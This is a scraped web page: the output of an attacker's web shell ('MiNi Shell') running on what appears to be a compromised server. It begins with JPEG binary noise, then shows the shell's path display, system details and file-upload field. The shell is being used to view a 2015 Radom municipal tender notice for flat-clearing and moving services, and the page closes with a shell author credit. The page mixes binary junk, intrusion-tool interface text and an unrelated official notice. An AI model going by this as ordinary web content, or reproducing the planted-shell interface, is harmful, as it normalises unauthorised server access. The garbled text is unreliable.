JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151124/317770-N-2015.html

<p class="kh_header"><b>Radom: ŚWIADCZENIE USŁUG W ZAKRESIE PRZEPROWADZEK I OPRÓŻNIANIA LOKALI MIESZKALNYCH I UŻYTKOWYCH DLA POTRZEB MIEJSKIEGO ZARZĄDU LOKALAMI W RADOMIU</b><br>
<b>Numer ogłoszenia: 317770 - 2015; data zamieszczenia: 24.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Lokalami w Radomiu , ul. Garbarska 55/57, 26-600 Radom, woj. mazowieckie, tel. 48 383 57 50, faks 48 383 57 48 w. 231.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mzlradom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA BUDŻETOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG W ZAKRESIE PRZEPROWADZEK I OPRÓŻNIANIA LOKALI MIESZKALNYCH I UŻYTKOWYCH DLA POTRZEB MIEJSKIEGO ZARZĄDU LOKALAMI W RADOMIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usług związanych z: transportem ruchomości przy wykwaterowaniach i eksmisjach z lokali mieszkalnych i użytkowych, w tym  z przynależnych do nich piwnic i komórek do lokali wskazanych przez Zamawiającego, oraz  opróżnianiem i sprzątaniem zwalnianych lokali  znajdujących się  w budynkach będących w zarządzie Zamawiającego.
2. Przedmiot  zamówienia obejmuje:
a)opróżnianie i sprzątanie lokali: mieszkalnych i użytkowych mieszczących się na różnych   kondygnacjach (z dostępem do windy lub bez dostępu do windy) wraz z przynależnymi piwnicami i komórkami  na skutek zgonów najemców i z innych przyczyn, oraz wykonywanie przeprowadzek przy eksmisjach do lokalu wskazanego przez Zamawiającego z lokali: mieszkalnych i użytkowych oraz  z przynależnych do nich  piwnic i komórek -  polegające na:  
-wyniesieniu   ruchomości i śmieci zgromadzonych w lokalu, w piwnicy i w komórkach,
- załadunku i rozładunku wyniesionych ruchomości i śmieci na podstawiony środek transportu,
-wniesieniu przetransportowanych ruchomości do wskazanego lokalu lub  depozytu 
-oznakowanie ruchomości przekazywanych do depozytu
-transporcie zabezpieczonych przed uszkodzeniem ruchomości do wskazanego lokalu lub depozytu na terenie miasta Radomia
-wywozie ruchomości i śmieci po opróżnianiu i sprzątaniu lokalu na wysypisko odpadów komunalnych, a w przypadku sprzętu elektrycznego i  elektronicznego (lub innych materiałów wymagających utylizacji) - utylizacji tych odpadów zgodnie z obowiązującymi przepisami
-wywozie pozostawionych śmieci i zbędnych ruchomości z lokalu po przeprowadzonej eksmisji na wysypisko odpadów komunalnych, 
b) wywóz pozostałości po pogorzeliskach,
c) wywóz pozostałości w lokalach mieszkalnych po pożarze, zalaniu itp.
d)wywóz innych nieczystości nietypowych.
3. Wymienione czynności  Wykonawca będzie wykonywał przy pomocy  zespołu składającego się z samochodu ciężarowego  (z plandeką lub zabudowaną skrzynią ładunkową o minimalnej ładowności 1,2 t) z kierowcą i z pracą minimum 4 pracowników. W uzasadnionych przypadkach przy użyciu 2 takich zespołów. Wykonawca zobowiązany jest zapewnić worki foliowe i kartony, taśmę do zaklejania  do wykonania usług pakowania odpadów i ruchomości.
4. Zamawiający zastrzega, że  wyżej wymienione odpady nie mogą być umieszczane w pojemnikach na odpady komunalne ustawione w nieruchomościach, a także pozostawiane na terenie  administrowanym przez Zamawiającego.
5. Wykonawca ma obowiązek udokumentować Zamawiającemu odbiór przyjęcia  usuniętych odpadów - ruchomości na wysypisko lub do ich utylizacji (np. dostarczyć karty odpadów lub umowy). 
6. Wykonawca ma obowiązek potwierdzania  otrzymania zlecenia czynności w ramach umowy: mailem, faksem bądź pisemnie,  w terminie   zgodnym z ofertą, maksymalnie 8 godzin od otrzymania zlecenia.
7. Zamawiający określa  maksymalną ilość m 2  jaka może zostać zrealizowana w ramach zamówienia  na 4600 m 2 powierzchni, z której wykonano usługę. Przyjęta liczba m 2 wykonywania usług wynika z analizy ilości wykonanych usług w roku 2014  i  do października 2015. W okresie roku wykonano - około 130 opróżnień lokali / pomieszczeń  i eksmisji  o średniej powierzchni lokalu 35 m2 z  czego około 80%  zasobów posiadało pomieszczenia przynależne o średniej powierzchni 5 m2  oraz około 12 opróżnień pomieszczeń o przeznaczeniu gospodarczym i innym o średniej powierzchni około 20 m2 
8. Zamawiający zastrzega sobie prawo ograniczenia przedmiotu zamówienia w zakresie ilościowym (maksymalnie o 40% liczby m 2 , o której mowa w pkt. 6) w przypadku zmiany bieżących potrzeb, podyktowanych warunkami organizacyjnymi . Wykonawca nie będzie wnosił z tego tytułu żadnych roszczeń względem Zamawiającego.
W takim przypadku odstąpienie od realizacji części zamówienia traktowane będzie jako skorzystanie  Zamawiającego z prawa opcji i nie będzie wymagało sporządzenia aneksu do umowy ani stosowania przepisów o odstąpieniu od umowy. W takim przypadku Zamawiający nie będzie również zobowiązany do zapłaty kar umownych ani odszkodowania.
Ww. usługa realizowana będzie w zależności od potrzeb na podstawie indywidualnych zleceń zgłaszanych wykonawcy na druku stanowiącym załącznik nr 1 do wzoru umowy.
9. Zamawiający zastrzega sobie możliwość sprawowania kontroli, w dowolnie wybranym przez siebie momencie, nad wykonywaniem usługi. 
10. Wykonawca zobowiązuje się w ramach zawartej umowy do wykonania wszystkich czynności  określonych w Rozdziale IV w terminach wskazanych w zleceniach otrzymywanych od Zamawiającego. 
11.W przypadku gdy Zamawiający wezwie do wykonania usługi i nie odwoła zlecenia, minimum w dniu poprzedzającym jego wykonanie do godziny 15.00, a usługa z przyczyn niezależnych od Zamawiającego i Wykonawcy nie może zostać wykonana, wówczas Wykonawcy przysługuje wynagrodzenie w wysokości 20 % stawki określonej ofercie cenowej przypadającej za dane zlecenie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art.67 ust.1 pkt.6 ustawy. Zamówienie uzupełniające:
- może być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego,
- może być udzielone wyłącznie dotychczasowemu wykonawcy, wybranemu w niniejszym postępowaniu, po przeprowadzeniu negocjacji w trybie zamówienia z wolnej ręki,
- może stanowić nie więcej niż 30% wartości zamówienia podstawowego
- musi polegać na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe (być zgodne z przedmiotem zamówienia podstawowego)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 90.51.10.00-2, 98.39.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Oceny spełnienia w/w warunku, Zamawiający dokona metodą spełnia - nie  spełnia na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust 1 ustawy Pzp na druku, którego wzór został dołączony jako załącznik  nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą, że wykonali/wykonują w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, usługi  w zakresie przeprowadzek i opróżniania lokali mieszkalnych lub użytkowych, o łącznej wartości nie mniejszej niż 100.000,00 zł (brutto) (w ramach jednej umowy).
(Pod pojęciem przeprowadzek i opróżniania lokali  należy rozumieć w szczególności czyszczenie, wolnych lokali lub pomieszczeń takich jak np. lokale mieszkalne, użytkowe, strychy, piwnice i inne pomieszczenia gospodarcze, poprzez wyniesienie ruchomości i śmieci, załadunku ich na środek transportu oraz transporcie )
UWAGA: W przypadku wykonywania i nie zakończenia świadczenia usług wykonawca zobowiązany jest podać na jaką wartość, do momentu upływu terminu składania ofert, umowa/y została/y wykonana/e z tym, że wartość wykonanej usługi nie może być mniejsza niż 100.000,00 zł (brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą, że  na czas realizacji zamówienia będą dysponowali co najmniej dwoma samochodami ciężarowym  z plandeką lub zabudowaną skrzynią   ładunkową  o ład. min. 1,2 t</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Oceny spełnienia w/w warunku, Zamawiający dokona metodą spełnia - nie  spełnia na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust 1 ustawy Pzp na druku, którego wzór został dołączony jako załącznik  nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Oceny spełnienia w/w warunku, Zamawiający dokona metodą spełnia - nie  spełnia na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust 1 ustawy Pzp na druku, którego wzór został dołączony jako załącznik  nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W przedmiotowym postępowaniu pod pojęciem głównych usług należy rozumieć i w wykazie należy wskazać usługi potwierdzające spełnienie warunku udziału w postępowaniu dotyczące posiadania wiedzy i doświadczenia tj. warunku określonego w Rozdziale VI pkt. 1 b) SIWZ. W przypadku w/w usług Wykonawca ma także obowiązek załączyć dowody, o których mowa powyżej. Zamawiający nie wymaga złożenia informacji ani dowodów dotyczących innych usług niż usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia. Przez usługi odpowiadające przedmiotowi zamówienia Zamawiający rozumie minimum 1 usługę w  zakresie przeprowadzek i opróżniania lokali mieszkalnych lub użytkowych na kwotę nie mniejszą niż 100 000 zł brutto każda z tych usług. 
Dowodami, o których mowa w pkt 1 lit. b) zgodnie z § 1 ust. 2 pkt 1 i 3 Rozporządzenia Prezesa Rady Ministrów z dn. 19.02.2013r. są: 
-poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, określające czy usługi zostały wykonane należycie
-oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym  charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
UWAGA W przypadku, gdy zamawiający jest podmiotem na rzecz, którego usługi wskazane w wykazie wykonanych głównych usług (załącznik nr 5 do SIWZ) zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) W przypadku powoływania się przez Wykonawcę na potencjał innych podmiotów przy wykazywaniu spełniania  warunków, o których mowa w art. 22 ust. 1 ustawy, Wykonawca  zobowiązany  jest  do  przedstawienia pisemnego zobowiązania tych podmiotów, do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Treść zobowiązania podmiotu trzeciego powinna określać: 
-zakres dostępnych Wykonawcy zasobów innego podmiotu
-sposób wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia
-charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem
-zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia b) W przypadku złożenia oferty wspólnej należy załączyć  upoważnienie dla Pełnomocnika do reprezentowania podmiotów działających wspólnie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez osoby upoważnione do reprezentowania tych podmiotów (zgodnie z dokumentem określającym status prawny Wykonawcy lub dołączonym do oferty pełnomocnictwem). c) W przypadku ustanowienia pełnomocnika do reprezentacji w postępowaniu do oferty należy załączyć pełnomocnictwo rodzajowe lub szczegółowe wskazujące zakres pełnomocnictwa dla ustanowionego pełnomocnika. Pełnomocnictwo winno być złożone w oryginale lub w formie kopii potwierdzonej notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas reakcji na zgłoszenie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian umowy w drodze pisemnego aneksu pod rygorem nieważności zgodnie z art. 144 ust. 1 ustawy w następujących przypadkach:
a)	Rozszerzenia, zmiany zakresu podwykonawstwa lub podwykonawcy w porównaniu do wskazanego w ofercie, o ile będzie to korzystne dla Zamawiającego z tytułu należytego wykonania umowy, 
b)	Zmiany ceny brutto umowy - w przypadku zmiany stawki podatku VAT (przy zachowaniu dotychczasowej wartości netto) jeżeli nastąpi zmiana przepisów ustawy o podatku od towarów i usług i podatku akcyzowym
c)	Zmiany terminu obowiązywania umowy poprzez jego  skrócenie - w przypadku wcześniejszego niż do dnia 31.12.2016r. wykorzystania kwoty brutto o której mowa w § 6 pkt. 2 umowy 
d)	Zmiany terminu obowiązywania umowy poprzez jego  wydłużenie o maksymalny okres 6 miesięcy - w przypadku nie wykorzystania kwoty brutto, o której mowa w § 6 pkt. 2 umowy do dnia 31.12.2016 r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip@mzlradom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Lokalami w Radomiu
parter, sekretariat
ul. Garbarska 55/57
26-600 Radom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 12:00, miejsce: Miejski Zarząd Lokalami w Radomiu
parter, sekretariat
ul. Garbarska 55/57
26-600 Radom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com